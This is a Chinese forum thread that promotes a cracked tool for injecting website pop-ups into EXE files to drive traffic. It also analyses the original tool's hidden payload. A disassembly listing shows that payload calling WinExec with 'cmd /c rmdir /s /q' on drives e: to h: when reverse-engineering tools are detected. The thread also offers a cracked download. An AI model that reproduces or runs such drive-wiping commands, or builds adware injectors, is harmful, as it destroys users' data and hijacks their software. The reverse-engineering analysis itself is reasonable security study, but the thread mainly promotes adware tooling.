论坛风格切换
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 3103阅读
  • 2回复

[绿色软件]exe软件加弹窗工具 得流量很好用的工具 已经破解 [复制链接]

上一主题 下一主题
离线pony8000
 

发帖
53418
今日发帖
最后登录
2025-01-19
只看楼主 倒序阅读 使用道具 楼主  发表于: 2011-10-27 09:11:24
  软件加弹窗工具能将EXE文件中加入弹窗,运行软件的同时就会打开您的网站,
可以轻松为您的网站带来流量!
支持插入任意多个弹窗
支持超长网址
支持多种方案选择
支持弹出站内连接
支持加过壳的文件
支持退弹
支持隐藏浏览
支持自动升级
支持拖拽文件
支持WIN7系统
流量三部曲:
寻找软件插入弹窗->发布软件->网站流量提升
---------------------------------------------------------
源程序只对逆向人员有威胁,一般人不会有特别影响,可想而知作者对逆向人员有偏见啊,这样是不行的。
本想写段详细分析的,现在觉得没必要写太多,提醒一点[font=""]rmdir就可以了,估计新手都可以秒破了。
源程序里作者用到了[font=""]rmdir。【逆向朋友们注意看啦!比熊猫烧香还要毒百倍。被格了都不知道就杯具了。】
[font=""]rmdir命令详细分析[font=""]
请看源程序里的一段代码:
004040A0  /$  83EC 60       sub esp,0x60
004040A3  |.  53            push ebx
004040A4  |.  B3 64         mov bl,0x64
004040A6  |.  B0 20         mov al,0x20
004040A8  |.  B1 2F         mov cl,0x2F
004040AA  |.  B2 72         mov dl,0x72
004040AC  |.  56            push esi
004040AD  |.  C64424 08 63  mov byte ptr ss:[esp+0x8],0x63
004040B2  |.  C64424 09 6D  mov byte ptr ss:[esp+0x9],0x6D
004040B7  |.  885C24 0A     mov byte ptr ss:[esp+0xA],bl
004040BB  |.  884424 0B     mov byte ptr ss:[esp+0xB],al
004040BF  |.  884C24 0C     mov byte ptr ss:[esp+0xC],cl
004040C3  |.  C64424 0D 63  mov byte ptr ss:[esp+0xD],0x63
004040C8  |.  884424 0E     mov byte ptr ss:[esp+0xE],al
004040CC  |.  885424 0F     mov byte ptr ss:[esp+0xF],dl
004040D0  |.  C64424 10 6D  mov byte ptr ss:[esp+0x10],0x6D
004040D5  |.  885C24 11     mov byte ptr ss:[esp+0x11],bl
004040D9  |.  C64424 12 69  mov byte ptr ss:[esp+0x12],0x69
004040DE  |.  885424 13     mov byte ptr ss:[esp+0x13],dl
004040E2  |.  884424 14     mov byte ptr ss:[esp+0x14],al
004040E6  |.  884C24 15     mov byte ptr ss:[esp+0x15],cl
004040EA  |.  C64424 16 73  mov byte ptr ss:[esp+0x16],0x73
004040EF  |.  884424 17     mov byte ptr ss:[esp+0x17],al
004040F3  |.  884C24 18     mov byte ptr ss:[esp+0x18],cl
004040F7  |.  C64424 19 71  mov byte ptr ss:[esp+0x19],0x71
004040FC  |.  884424 1A     mov byte ptr ss:[esp+0x1A],al
00404100  |.  C64424 1B 65  mov byte ptr ss:[esp+0x1B],0x65
00404105  |.  C64424 1C 3A  mov byte ptr ss:[esp+0x1C],0x3A
0040410A  |.  C64424 1D 5C  mov byte ptr ss:[esp+0x1D],0x5C
0040410F  |.  C64424 1E 00  mov byte ptr ss:[esp+0x1E],0x0
00404114  |.  C64424 20 63  mov byte ptr ss:[esp+0x20],0x63
00404119  |.  C64424 21 6D  mov byte ptr ss:[esp+0x21],0x6D
0040411E  |.  885C24 22     mov byte ptr ss:[esp+0x22],bl
00404122  |.  884424 23     mov byte ptr ss:[esp+0x23],al
00404126  |.  884C24 24     mov byte ptr ss:[esp+0x24],cl
0040412A  |.  C64424 25 63  mov byte ptr ss:[esp+0x25],0x63
0040412F  |.  884424 26     mov byte ptr ss:[esp+0x26],al
00404133  |.  885424 27     mov byte ptr ss:[esp+0x27],dl
00404137  |.  C64424 28 6D  mov byte ptr ss:[esp+0x28],0x6D
0040413C  |.  885C24 29     mov byte ptr ss:[esp+0x29],bl
00404140  |.  C64424 2A 69  mov byte ptr ss:[esp+0x2A],0x69
00404145  |.  885424 2B     mov byte ptr ss:[esp+0x2B],dl
00404149  |.  884424 2C     mov byte ptr ss:[esp+0x2C],al
0040414D  |.  884C24 2D     mov byte ptr ss:[esp+0x2D],cl
00404151  |.  C64424 2E 73  mov byte ptr ss:[esp+0x2E],0x73
00404156  |.  884424 2F     mov byte ptr ss:[esp+0x2F],al
0040415A  |.  884C24 30     mov byte ptr ss:[esp+0x30],cl
0040415E  |.  C64424 31 71  mov byte ptr ss:[esp+0x31],0x71
00404163  |.  884424 32     mov byte ptr ss:[esp+0x32],al
00404167  |.  C64424 33 66  mov byte ptr ss:[esp+0x33],0x66
0040416C  |.  C64424 34 3A  mov byte ptr ss:[esp+0x34],0x3A
00404171  |.  C64424 35 5C  mov byte ptr ss:[esp+0x35],0x5C
00404176  |.  C64424 36 00  mov byte ptr ss:[esp+0x36],0x0
0040417B  |.  C64424 38 63  mov byte ptr ss:[esp+0x38],0x63
00404180  |.  C64424 39 6D  mov byte ptr ss:[esp+0x39],0x6D
00404185  |.  885C24 3A     mov byte ptr ss:[esp+0x3A],bl
00404189  |.  884424 3B     mov byte ptr ss:[esp+0x3B],al
0040418D  |.  884C24 3C     mov byte ptr ss:[esp+0x3C],cl
00404191  |.  C64424 3D 63  mov byte ptr ss:[esp+0x3D],0x63
00404196  |.  884424 3E     mov byte ptr ss:[esp+0x3E],al
0040419A  |.  885424 3F     mov byte ptr ss:[esp+0x3F],dl
0040419E  |.  C64424 40 6D  mov byte ptr ss:[esp+0x40],0x6D
004041A3  |.  885C24 41     mov byte ptr ss:[esp+0x41],bl
004041A7  |.  C64424 42 69  mov byte ptr ss:[esp+0x42],0x69
004041AC  |.  885424 43     mov byte ptr ss:[esp+0x43],dl
004041B0  |.  884424 44     mov byte ptr ss:[esp+0x44],al
004041B4  |.  884C24 45     mov byte ptr ss:[esp+0x45],cl
004041B8  |.  C64424 46 73  mov byte ptr ss:[esp+0x46],0x73
004041BD  |.  884424 47     mov byte ptr ss:[esp+0x47],al
004041C1  |.  884C24 48     mov byte ptr ss:[esp+0x48],cl
004041C5  |.  C64424 49 71  mov byte ptr ss:[esp+0x49],0x71
004041CA  |.  884424 4A     mov byte ptr ss:[esp+0x4A],al
004041CE  |.  C64424 4B 67  mov byte ptr ss:[esp+0x4B],0x67
004041D3  |.  C64424 4C 3A  mov byte ptr ss:[esp+0x4C],0x3A
004041D8  |.  C64424 4D 5C  mov byte ptr ss:[esp+0x4D],0x5C
004041DD  |.  C64424 4E 00  mov byte ptr ss:[esp+0x4E],0x0
004041E2  |.  C64424 50 63  mov byte ptr ss:[esp+0x50],0x63
004041E7  |.  C64424 51 6D  mov byte ptr ss:[esp+0x51],0x6D
004041EC  |.  885C24 52     mov byte ptr ss:[esp+0x52],bl
004041F0  |.  884424 53     mov byte ptr ss:[esp+0x53],al
004041F4  |.  884C24 54     mov byte ptr ss:[esp+0x54],cl
004041F8  |.  C64424 55 63  mov byte ptr ss:[esp+0x55],0x63
004041FD  |.  8B35 F8A24300 mov esi,dword ptr ds:[;  kernel32.WinExec
00404203  |.  884424 56     mov byte ptr ss:[esp+0x56],al
00404207  |.  884424 5C     mov byte ptr ss:[esp+0x5C],al
0040420B  |.  884424 5F     mov byte ptr ss:[esp+0x5F],al
0040420F  |.  884424 62     mov byte ptr ss:[esp+0x62],al
00404213  |.  8D4424 08     lea eax,dword ptr ss:[esp+0x8]           ;  cmd /c rmdir /s /q e:\
00404217  |.  6A 05         push 0x5                                 ; /ShowState = SW_SHOW
00404219  |.  50            push eax                                 ; |cmdLine="cmd /c rmdir /s /q e:\"
0040421A  |.  885424 5F     mov byte ptr ss:[esp+0x5F],dl            ; |
0040421E  |.  C64424 60 6D  mov byte ptr ss:[esp+0x60],0x6D          ; |
00404223  |.  885C24 61     mov byte ptr ss:[esp+0x61],bl            ; |
00404227  |.  C64424 62 69  mov byte ptr ss:[esp+0x62],0x69          ; |
0040422C  |.  885424 63     mov byte ptr ss:[esp+0x63],dl            ; |
00404230  |.  884C24 65     mov byte ptr ss:[esp+0x65],cl            ; |
00404234  |.  C64424 66 73  mov byte ptr ss:[esp+0x66],0x73          ; |
00404239  |.  884C24 68     mov byte ptr ss:[esp+0x68],cl            ; |
0040423D  |.  C64424 69 71  mov byte ptr ss:[esp+0x69],0x71          ; |
00404242  |.  C64424 6B 68  mov byte ptr ss:[esp+0x6B],0x68          ; |
00404247  |.  C64424 6C 3A  mov byte ptr ss:[esp+0x6C],0x3A          ; |
0040424C  |.  C64424 6D 5C  mov byte ptr ss:[esp+0x6D],0x5C          ; |
00404251  |.  C64424 6E 00  mov byte ptr ss:[esp+0x6E],0x0           ; |
00404256  |.  FFD6          call esi                                 ; \WinExec
00404258  |.  8D4C24 20     lea ecx,dword ptr ss:[esp+0x20]          ;  cmd /c rmdir /s /q f:\
0040425C  |.  6A 05         push 0x5                                 ; /ShowState = SW_SHOW
0040425E  |.  51            push ecx                                 ; |cmdLine="cmd /c rmdir /s /q f:\"
0040425F  |.  FFD6          call esi                                 ; \WinExec
00404261  |.  8D5424 38     lea edx,dword ptr ss:[esp+0x38]          ;  cmd /c rmdir /s /q g:\
00404265  |.  6A 05         push 0x5                                 ; /ShowState = SW_SHOW
00404267  |.  52            push edx                                 ; |cmdLine="cmd /c rmdir /s /q g:\"
00404268  |.  FFD6          call esi                                 ; \WinExec
0040426A  |.  8D4424 50     lea eax,dword ptr ss:[esp+0x50]          ;  cmd /c rmdir /s /q h:\
0040426E  |.  6A 05         push 0x5                                 ; /ShowState = SW_SHOW
00404270  |.  50            push eax                                 ; |CmdLine = "cmd /c rmdir /s /q h:\"
00404271  |.  FFD6          call esi                                 ; \cmdLine="cmd /c rmdir /s /q h:\"
00404273  |.  5E            pop esi
00404274  |.  5B            pop ebx
00404275  |.  83C4 60       add esp,0x60
00404278  \.  C3            retn
除了C盘基本上都干掉了,很邪恶吧....水平不高思想邪恶....
需要学习的,到他官网下载,但一定要注意安全性,在虚拟机下进行调试安全点哦。
------------------------------------------------------
声明:
1.原程序含有很大危险性的格盘命令,检测到OD,W32等多种逆向工具就秒格啦,逆向的朋友们要注意啦
!!
2.本人发布的已经屏蔽了格盘命令,不会再发生格盘效果!为了保留格盘证据完整封印在软件里,对逆向
工程师有一定的威胁性。
3.只在吾爱破解发布!!!不是在吾爱下载的请注意安全性。
4.作者非常的邪恶,摆明公开挑战逆向人员。要想不被调试就不要写软件!
5.此软件献给本群 广西╰→剑哥 ,他是第一个受害者,为你默哀三分钟,哈哈。
6.未经本人同意不得转载。
                                                              by 小叨
      [attachment=125919]                                                       2011年7月7日
在论坛的坛友强烈要求下,发出小叨和谐版,这个是完全破解版。
大家破解这个应该不是很难的,动动手啊,晕..
破解思路:
虚拟机下破解,运行软件在系统临时文件里会出现一个TXT文件【楼下有回帖,自己查看】,先去掉检测虚拟机,再去掉格盘命令,注册直接拦截提示直达啦。
和谐版声明:
1.完全去除格盘命令
2.不鼓励大家用这个软件,只供完全破解后的样品参考。
点击进入下载页面: 小叨和谐版.rar (1052 K) 下载次数:1
软件下载咨询邮箱: sdbeta@qq.com (回复及时)
 
精品软件:百度搜闪电软件园  最新软件百度搜:闪电下载吧
有问题联系 sdbeta@qq.com
离线740183466
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 沙发  发表于: 2011-11-03 22:26:58
不鼓励大家用这个软件,只供完全破解后的样品参考。
离线闪电

发帖
27990
今日发帖
最后登录
2025-01-20
只看该作者 板凳  发表于: 2012-04-18 07:41:27
不错的呀 下载;哦
百度一下“闪电软件园”,惊喜等着您哦!
┖───────────────┘┕━━━━┛